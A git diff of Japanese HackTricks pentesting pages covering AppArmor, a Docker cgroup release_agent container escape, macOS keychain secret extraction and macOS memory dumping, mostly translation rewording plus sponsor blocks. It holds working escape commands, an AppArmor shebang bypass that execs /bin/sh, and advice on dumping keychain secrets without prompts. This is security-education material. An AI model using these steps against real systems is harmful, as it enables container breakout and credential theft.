- **ポリシー**プログラムの動作とリソースアクセスのルールと制限を指定します。
- **パーサー**ポリシーをカーネルにロードして強制または報告します。
- **ユーティリティ**AppArmor とのやり取りと管理のためのインターフェースを提供するユーザーモードプログラムです。
### プロファイルのパス
AppArmor プロファイルは通常、_**/etc/apparmor.d/**_ に保存されます。\
`sudo aa-status` を使用すると、いくつかのプロファイルに制限がかけられているバイナリをリストアップできます。リストされた各バイナリのパスのスラッシュ "/" をドットに変更すると、言及されたフォルダ内の apparmor プロファイルの名前が取得できます。
たとえば、_**/usr/bin/man**_ **apparmor** プロファイルは _**/etc/apparmor.d/usr.bin.man**_ にあります。
たとえば、_/usr/bin/man_ の **apparmor** プロファイルは _/etc/apparmor.d/usr.bin.man_ にあります。
### コマンド
```bash
@ -60,8 +74,8 @@ aa-mergeprof #used to merge the policies
* **Px**(環境をクリーンアップした後、別のプロファイルで実行)
* **Cx**(環境をクリーンアップした後、子プロファイルで実行)
* **Ux**(環境をクリーンアップした後、無制限に実行)
* **変数**はプロファイルで定義でき、プロファイルの外部から操作できます。例:@{PROC} および @{HOME}(プロファイルファイルに #include \<tunables/global> を追加)
* **許可ルールを上書きするために拒否ルールがサポートされています**
* **プロファイル内で変数**を定義し、プロファイルの外部から操作できます。例:@{PROC} および @{HOME}(プロファイルファイルに #include \<tunables/global> を追加)
* **許可ルールを上書きするために拒否ルールがサポート**されています。
### aa-genprof
@ -109,9 +123,9 @@ sudo aa-easyprof /path/to/binary
```bash
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
```
### ログからプロファイルを修正する
### ログからプロファイルを変更する
次のツールはログを読み取り、ユーザーに検出された禁止されたアクションの許可を求めます:
次のツールはログを読み取り、ユーザーに検出された禁止されたアクションのうち許可するものがあるかどうかを尋ねます:
```bash
sudo aa-logprof
```
@ -134,7 +148,7 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
```
以下の情報を使用して取得することもできます:
以下の情報も取得できます:
```bash
sudo aa-notify -s 1 -v
Profile: /bin/service_bin
@ -152,7 +166,7 @@ Logfile: /var/log/audit/audit.log
AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)
For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
```
## Docker内のApparmor
## DockerにおけるApparmor
デフォルトでDockerのプロファイル**docker-profile**がロードされていることに注意してください:
```bash
@ -192,27 +206,27 @@ docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin
echo "" > /proc/stat
sh: 1: cannot create /proc/stat: Permission denied
```
必要に応じて、AppArmorを**無効に**して、その制限をバイパスします。
必要なら、AppArmorの制限をバイパスするために**AppArmorを無効にする**必要があります。
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
```
デフォルトでは**AppArmor**は、SYS\_ADMIN機能を持っていても、コンテナが内部からフォルダをマウントすることを**禁止します**。
デフォルトでは、**AppArmor** はコンテナがSYS\_ADMIN機能を持っていても、内部からフォルダをマウントすることを**禁止します**。
dockerコンテナに**capabilities**を**追加/削除**できることに注意してください(これは**AppArmor**や**Seccomp**などの保護方法によって引き続き制限されます):
**capabilities**をdockerコンテナに**追加/削除**することができます(これは**AppArmor**や**Seccomp**などの保護方法によって引き続き制限されます):
- `--cap-add=SYS_ADMIN``SYS_ADMIN`機能を付与します
- `--cap-add=ALL` はすべての機能を付与します
- `--cap-drop=ALL --cap-add=SYS_PTRACE` はすべての機能を削除し、`SYS_PTRACE`のみを付与します
- `--cap-add=SYS_ADMIN` `SYS_ADMIN` 機能を与えます
- `--cap-add=ALL` はすべての機能を与えます
- `--cap-drop=ALL --cap-add=SYS_PTRACE` はすべての機能を削除し、`SYS_PTRACE` のみを与えます
{% hint style="info" %}
通常、**docker**コンテナ内で**特権機能**が**利用可能**であることがわかった場合でも、**exploitの一部が機能しない**場合は、docker **apparmorがそれを防いでいる**可能性があります。
通常、**docker**コンテナ内で**特権機能**が利用可能であることがわかった場合でも、**exploit**の一部が機能しない場合は、docker **apparmor がそれを防いでいる**可能性があります。
{% endhint %}
### 例
[**こちら**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)の例から)
AppArmorの機能を説明するために、次の行が追加された新しいDockerプロファイル「mydocker」を作成しました:
AppArmorの機能を説明するために、新しいDockerプロファイル "mydocker" を作成し、次の行を追加しました:
```
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
```
@ -238,7 +252,7 @@ docker inspect 9d622d73a614 | grep lowpriv
"AppArmorProfile": "lowpriv",
"apparmor=lowpriv"
```
その後、次の行を実行して、**使用されている正確なプロファイルを見つける**ことができます:
その後、次の行を実行して、**使用されている正確なプロファイルを見つける**ことができます
```bash
find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
```
@ -248,7 +262,7 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
### AppArmor Shebang Bypass
[**このバグ**](https://bugs.launchpad.net/apparmor/+bug/1911431)では、**特定のリソースでperlの実行を防いでいる場合でも**、最初の行に**`#!/usr/bin/perl`**を指定したシェルスクリプトを作成し、ファイルを直接**実行**すると、任意のコマンドを実行できることが示されています。例:
[**このバグ**](https://bugs.launchpad.net/apparmor/+bug/1911431)では、**特定のリソースでperlの実行を防いでいる場合でも**、最初の行に**`#!/usr/bin/perl`**を指定したシェルスクリプトを作成し、**ファイルを直接実行**すると、任意のコマンドを実行できることが示されています。例:
```perl
echo '#!/usr/bin/perl
use POSIX qw(strftime);
@ -258,16 +272,28 @@ exec "/bin/sh"' > /tmp/test.pl
chmod +x /tmp/test.pl
/tmp/test.pl
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
* **HackTricks で企業を宣伝したい**または**HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**する
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたり**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローする。**
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
</details>

53
linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
View file

@ -4,16 +4,29 @@
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する。
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* [**公式PEASSHackTricksスッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
**詳細については、[元のブログ投稿](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)を参照してください。** これは要約です:
@ -34,14 +47,14 @@ $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
```
2. **子Cgroupの設定:**
- マウントされたcgroupディレクトリ内に "x" という名前の子Cgroupが作成されます。
- マウントされたcgroupディレクトリ内に名前が"x"の子Cgroupが作成されます。
- "x" Cgroupのnotify_on_releaseファイルに1を書き込むことで、"x" Cgroupの通知が有効になります。
```shell
echo 1 > /tmp/cgrp/x/notify_on_release
```
3. **リリースエージェントの設定:**
- ホスト上のコンテナのパスは、/etc/mtab ファイルから取得されます。
- 次に、cgroupのrelease_agent ファイルが取得したホストパスにある /cmd というスクリプトを実行するように設定されます。
- 次に、cgroupの release_agent ファイルが取得したホストパスにある /cmd というスクリプトを実行するように設定されます。
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
@ -59,16 +72,28 @@ chmod a+x /cmd
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見る
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**する。
* **ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出してください。
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたり**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**したり、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

74
macos-hardening/macos-red-teaming/macos-keychain.md
View file

@ -6,14 +6,28 @@
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は**、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
- **Discordグループ**に**参加**💬(https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**🐦で**フォロー**する[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**https://github.com/carlospolop/hacktricksと[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@carlospolopm**をフォローする
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## メインキーチェーン
- **ユーザーキーチェーン**`~/Library/Keychains/login.keycahin-db`)は、アプリケーションパスワード、インターネットパスワード、ユーザー生成証明書、ネットワークパスワード、ユーザー生成の公開/秘密鍵など、**ユーザー固有の資格情報**を保存するために使用されます。
@ -27,22 +41,22 @@ HackTricksをサポートする他の方法
### ACLs
キーチェーン内の各エントリは、**アクセス制御リストACLs**によって管理され、キーチェーンエントリでさまざまなアクションを実行できるユーザーを規定します。これには以下が含まれます:
キーチェーン内の各エントリは、さまざまなアクションを実行できるユーザーを規定する**アクセス制御リストACLs**によって管理されます。これには以下が含まれます:
- **ACLAuhtorizationExportClear**:保持者が秘密のクリアテキストを取得できるようにします。
- **ACLAuhtorizationExportWrapped**:保持者がの提供されたパスワードで暗号化されたクリアテキストを取得できるようにします。
- **ACLAuhtorizationExportWrapped**:保持者がの提供されたパスワードで暗号化されたクリアテキストを取得できるようにします。
- **ACLAuhtorizationAny**:保持者が任意のアクションを実行できるようにします。
ACLsにはさらに、プロンプトなしでこれらのアクションを実行できる**信頼されたアプリケーションのリスト**が付属しています。これには以下が含まれます:
ACLsには、プロンプトなしでこれらのアクションを実行できる**信頼されたアプリケーションのリスト**が付属しています。これには以下が含まれます:
- **`Nil`**(認証不要、**誰もが信頼されている**
- **空の**リスト(**誰も**が信頼されていない
- 空のリスト(**誰もが信頼されていない**
- 特定の**アプリケーション**の**リスト**。
また、エントリには**`ACLAuthorizationPartitionID`**が含まれる場合があり、これは**teamid、apple、cdhash**を識別するために使用されます。
また、エントリには**`ACLAuthorizationPartitionID`**が含まれる場合があり、**teamid、apple、cdhash**を識別するために使用されます。
- **teamid**が指定されている場合、**エントリにアクセス**するためには、使用されるアプリケーションが**同じteamid**を持っている必要があります。
- **apple**が指定されている場合、アプリは**Apple**によって**署名**されている必要があります。
- **teamid**が指定されている場合、**エントリの値にアクセス**するためには、使用されるアプリケーションが**同じteamid**を持っている必要があります。
- **apple**が指定されている場合、アプリは**Appleによって署名**されている必要があります。
- **cdhash**が示されている場合、**アプリ**は特定の**cdhash**を持っている必要があります。
### キーチェーンエントリの作成
@ -79,12 +93,12 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
### API
{% hint style="success" %}
**プロンプトを生成しない**シークレットの**キーチェーン列挙とダンプ**は、[**LockSmith**](https://github.com/its-a-feature/LockSmith)ツールを使用して行うことができます。
**キーチェーン列挙とダンプ**は、[**LockSmith**](https://github.com/its-a-feature/LockSmith)というツールを使用して、**プロンプトを生成しない**シークレットの取得が可能です。
{% endhint %}
各キーチェーンエントリのリストと**情報**を取得します:
各キーチェーンエントリの**情報**をリスト化および取得します:
* API **`SecItemCopyMatching`** は各エントリに関する情報を提供し、使用する際に設定できるいくつかの属性があります:
* API **`SecItemCopyMatching`** は各エントリに関する情報を提供し、使用に設定できるいくつかの属性があります:
* **`kSecReturnData`**trueの場合、データの復号を試みますポップアップを回避するためにfalseに設定
* **`kSecReturnRef`**キーチェーンアイテムへの参照も取得します後でポップアップなしで復号できることがわかった場合にtrueに設定
* **`kSecReturnAttributes`**:エントリに関するメタデータを取得します
@ -93,9 +107,9 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
各エントリの**ACL**を取得します:
* API **`SecAccessCopyACLList`** を使用すると、**キーチェーンアイテムのACL**を取得し、ACLのリスト`ACLAuhtorizationExportClear`などの以前に言及されたもの)が返されます。各リストには以下が含まれます:
* API **`SecAccessCopyACLList`** を使用すると、キーチェーンアイテムの**ACL**を取得し、ACLのリスト`ACLAuhtorizationExportClear`などの以前に言及されたもの)が返されます。各リストには以下が含まれます:
* 説明
* **信頼されたアプリケーションリスト**。これには次のようなものが含まれる可能性があります:
* **信頼されたアプリケーションリスト**。これには次のようなものが含まれます:
* アプリ:/Applications/Slack.app
* バイナリ:/usr/libexec/airportd
* グループgroup://AirPort
@ -105,7 +119,7 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
* API **`SecKeychainItemCopyContent`** は平文を取得します
* API **`SecItemExport`** はキーと証明書をエクスポートしますが、コンテンツを暗号化してエクスポートするにはパスワードを設定する必要があります
そして、**プロンプトなしでシークレットをエクスポート**するための**要件**は次のとおりです:
そして、**プロンプトを生成せずにシークレットをエクスポート**するための**要件**は次のとおりです:
* **1つ以上の信頼された**アプリがリストされている場合:
* 適切な**認可**が必要(**`Nil`**、またはシークレット情報にアクセスするための認可されたアプリの許可リストの一部である必要があります)
@ -119,7 +133,7 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
{% hint style="danger" %}
したがって、**1つのアプリケーションがリストされている**場合、そのアプリケーションに**コードをインジェクトする**必要があります。
**PartitionID**に**apple**が指定されている場合、**`osascript`**を使用してアクセスできます。つまり、PartitionIDにappleが含まれているすべてのアプリケーションを信頼しているものにアクセスできます。**`Python`**も使用できます。
**PartitionID**に**apple**が指定されている場合、**`osascript`**を使用してアクセスできます。つまり、PartitionIDにappleを持つすべてのアプリケーションに信頼されているものです。**`Python`**も使用できます。
{% endhint %}
### 2つの追加属性
@ -132,16 +146,28 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認するための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローしてください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

64
macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
View file

@ -8,35 +8,49 @@ HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する
- **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、**あなたのハッキングテクニックを共有**してください。
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[Telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦で**フォロー**する:[**@carlospolopm**](https://twitter.com/hacktricks_live)。
- **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>
## メモリーアーティファクト
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スチーラーマルウェア**によって**侵害**されているかどうかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## メモリアーティファクト
### スワップファイル
`/private/var/vm/swapfile0`などのスワップファイルは、**物理メモリがいっぱいのときのキャッシュ**として機能します。物理メモリにもう余裕がない場合、そのデータはスワップファイルに転送され、必要に応じて物理メモリに戻されます。swapfile0、swapfile1などの名前で複数のスワップファイルが存在する可能性があります。
`/private/var/vm/swapfile0`などのスワップファイルは、**物理メモリがいっぱいのときのキャッシュ**として機能します。物理メモリにもう余裕がない場合、そのデータはスワップファイルに転送され、必要に応じて物理メモリに戻されます。swapfile0、swapfile1などの名前複数のスワップファイルが存在する可能性があります。
### ハイバネーションイメージ
`/private/var/vm/sleepimage`にあるファイルは、**ハイバネーションモード**中に重要です。**OS Xが休止状態になるときにメモリからのデータがこのファイルに保存**されます。コンピューターを起動するとき、システムはこのファイルからメモリデータを取得し、ユーザーが前回終了したところから続行できるようにします。
`/private/var/vm/sleepimage`にあるファイルは、**ハイバネーションモード**中に重要です。OS Xが休止状態に入るとき、**メモリからのデータはこのファイルに保存**されます。コンピューターを起動すると、システムはこのファイルからメモリデータを取得し、ユーザーが前回終了したところから続行できるようにします。
現代のMacOSシステムでは、セキュリティ上の理由からこのファイルが通常暗号化されているため、回復が難しいことに注意してください。
現代のMacOSシステムでは、セキュリティ上の理由からこのファイルが通常暗号化されているため、回復が難しいことに注意する価値があります
- sleepimageの暗号化が有効かどうかを確認するには、`sysctl vm.swapusage`コマンドを実行します。これにより、ファイルが暗号化されているかどうかが表示されます。
* sleepimageの暗号化が有効になっているかどうかを確認するには、`sysctl vm.swapusage`コマンドを実行します。これにより、ファイルが暗号化されているかどうかが表示されます。
### メモリープレッシャーログ
### メモリプレッシャーログ
MacOSシステムのもう1つの重要なメモリ関連ファイルは**メモリプレッシャーログ**です。これらのログは`/var/log`にあり、システムのメモリ使用状況やプレッシャーイベントに関する詳細な情報を含んでいます。これらは、メモリ関連の問題の診断やシステムが時間の経過とともにメモリをどのように管理しているかを理解するのに特に役立ちます。
MacOSシステムのもう1つの重要なメモリ関連ファイルは**メモリプレッシャーログ**です。これらのログは`/var/log`にあり、システムのメモリ使用状況やプレッシャーイベントに関する詳細な情報を含んでいます。これらは、メモリ関連の問題の診断やシステムが時間の経過とともにメモリをどのように管理しているかを理解するのに特に役立ちます。
## osxpmemを使用したメモリーダンプ
MacOSマシンでメモリをダンプするには、[**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip)を使用できます。
MacOSマシンでメモリをダンプするためには、[**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip)を使用できます。
**注意**: 以下の手順は、Intelアーキテクチャを搭載したMacでのみ機能します。このツールは現在アーカイブされており、最後のリリースは2017年に行われました。以下の手順でダウンロードしたバイナリは、Apple Siliconが2017年には存在しなかったため、Intelチップをターゲットにしています。arm64アーキテクチャ向けにバイナリをコンパイルすることも可能かもしれませんが、自分で試してみる必要があります。
**注意**: 以下の手順は、Intelアーキテクチャを搭載したMacでのみ機能します。このツールは現在アーカイブされており、最後のリリースは2017年です。以下の手順でダウンロードしたバイナリは、Apple Siliconが2017年には存在しなかったため、Intelチップをターゲットにしています。arm64アーキテクチャ向けにバイナリをコンパイルすることも可能かもしれませんが、自分で試してみる必要があります。
```bash
#Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
@ -51,9 +65,9 @@ sudo kextutil "/tmp/MacPmem.kext"
#Allow the kext in "Security & Privacy --> General"
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
